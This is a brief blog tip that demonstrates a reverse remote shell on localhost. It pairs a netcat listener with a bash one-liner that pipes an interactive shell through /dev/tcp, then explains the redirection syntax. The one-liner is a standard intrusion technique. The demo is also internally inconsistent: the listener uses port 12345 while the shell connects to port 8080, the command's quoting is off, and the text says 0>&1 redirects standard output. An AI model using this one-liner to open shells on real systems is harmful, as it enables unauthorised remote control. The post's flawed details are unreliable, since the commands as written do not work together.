Tuesday, March 28, 2017

Tip: Quick and dirty reverse remote shell

Here is how to get reverse remote shell. I say reverse because the remote system is connecting to you. I'll demonstrate it on a single machine for simplicity. So, open a terminal and run the following command in it:
nc -l 12345
This will start netcat which will listen on port 12345. Then, in the second terminal, run the following command:
/bin/bash -c bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
You won't notice anything in the first window where nc command is running, but try to enter some command there, e.g. pwd. :) What you've got, is remote shell. Obviously, because of the way things work you don't get prompt and other fancy stuff, but it works and that's important. :)

What you basically did is that you run interactive bash process (the option -i) with standard error and standard output redirected to /dev/tcp/127.0.0.1/8080 (redirection operator >&) and also standard output being redirected to the same file (the last 0>&1). The file being redirected to and from is a special notation for the bash shell that allows it to open connections, i.e. the syntax is:
/dev/<protocol>/<ipaddress>/<port>
More details can be found in bash manual page.

About Me

scientist, consultant, security specialist, networking guy, system administrator, philosopher ;)

Blog Archive